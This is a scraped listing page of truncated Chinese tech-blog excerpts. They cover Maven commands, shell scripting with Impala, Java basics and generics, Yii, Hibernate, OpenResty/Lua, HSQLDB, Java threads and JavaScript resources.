    Maven 常用命令   mvn archetype:generate mvn install mvn clean mvn clean complie mvn clean test mvn clean install mvn clean package mvn test mvn package mvn site   mvn dependency:res
  • shell bad substitution daizj shell脚本
    #!/bin/sh /data/script/common/run_cmd.exp 192.168.13.168 "impala-shell -islave4 -q 'insert OVERWRITE table imeis.${tableName} select ${selectFields}, ds, fnv_hash(concat(cast(ds as string), im
  • Java SE 第二讲(原生数据类型 Primitive Data Type) dcj3sjt126com java
    Java SE  第二讲: 1.   Windows: notepad, editplus, ultraedit, gvim Linux: vi, vim, gedit 2.   Java 中的数据类型分为两大类: 1)原生数据类型  (Primitive Data Type) 2)引用类型(对象类型)  (R
  • CGridView中实现批量删除 dcj3sjt126com PHPyii
    1,CGridView中的columns添加 array( 'selectableRows' => 2, 'footer' => '<button type="button" onclick="GetCheckbox();" style=&
  • Java中泛型的各种使用 dyy_gusi java泛型
    Java中的泛型的使用:1.普通的泛型使用 在使用类的时候后面的<>中的类型就是我们确定的类型。 public class MyClass1<T> {//此处定义的泛型是T private T var; public T getVar() { return var; } public void setVa
  • Web开发技术十年发展历程 gcq511120594 Web浏览器数据挖掘
    回顾web开发技术这十年发展历程: Ajax 03年的时候我上六年级,那时候网吧刚在小县城的角落萌生。传奇,大话西游第一代网游一时风靡。我抱着试一试的心态给了网吧老板两块钱想申请个号玩玩,然后接下来的一个小时我一直在,注,册,账,号。 彼时网吧用的512k的带宽,注册的时候,填了一堆信息,提交,页面跳转,嘣,”您填写的信息有误,请重填”。然后跳转回注册页面,以此循环。我现在时常想,如果当时a
  • openSession()与getCurrentSession()区别: hetongfei javaDAOHibernate
    来自 http://blog.csdn.net/dy511/article/details/6166134 1.getCurrentSession创建的session会和绑定到当前线程,而openSession不会。 2. getCurrentSession创建的线程会在事务回滚或事物提交后自动关闭,而openSession必须手动关闭。 这里getCurrentSession本地事务(本地
  • 第一章 安装Nginx+Lua开发环境 jinnianshilongnian nginxluaopenresty
    首先我们选择使用OpenResty,其是由Nginx核心加很多第三方模块组成,其最大的亮点是默认集成了Lua开发环境,使得Nginx可以作为一个Web Server使用。借助于Nginx的事件驱动模型和非阻塞IO,可以实现高性能的Web应用程序。而且OpenResty提供了大量组件如Mysql、Redis、Memcached等等,使在Nginx上开发Web应用更方便更简单。目前在京东如实时价格、秒
  • HSQLDB In-Process方式访问内存数据库 liyonghui160com
        HSQLDB一大特色就是能够在内存中建立数据库,当然它也能将这些内存数据库保存到文件中以便实现真正的持久化。   先睹为快!   下面是一个In-Process方式访问内存数据库的代码示例:     下面代码需要引入hsqldb.jar包 (hsqldb-2.2.8)   import java.s
  • Java线程的5个使用技巧 pda158 java数据结构
    Java线程有哪些不太为人所知的技巧与用法?   萝卜白菜各有所爱。像我就喜欢Java。学无止境,这也是我喜欢它的一个原因。日常 工作中你所用到的工具,通常都有些你从来没有了解过的东西,比方说某个方法或者是一些有趣的用法。比如说线程。没错,就是线程。或者确切说是Thread这个类。当我们在构建高可扩展性系统的时候,通常会面临各种各样的并发编程的问题,不过我们现在所要讲的可能会略有不同。
  • 开发资源大整合:编程语言篇——JavaScript(1) shoothao JavaScript
    概述:本系列的资源整合来自于github中各个领域的大牛,来收藏你感兴趣的东西吧。     程序包管理器   管理javascript库并提供对这些库的快速使用与打包的服务。 Bower - 用于web的程序包管理。 component - 用于客户端的程序包管理,构建更好的web应用程序。 spm - 全新的静态的文件包管
  • 避免使用终结函数 vahoa.ma javajvmC++
    终结函数(finalizer)通常是不可预测的,常常也是很危险的,一般情况下不是必要的。使用终结函数会导致不稳定的行为、更差的性能,以及带来移植性问题。不要把终结函数当做C++中的析构函数(destructors)的对应物。       我自己总结了一下这一条的综合性结论是这样的: 1)在涉及使用资源,使用完毕后要释放资源的情形下,首先要用一个显示的方
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他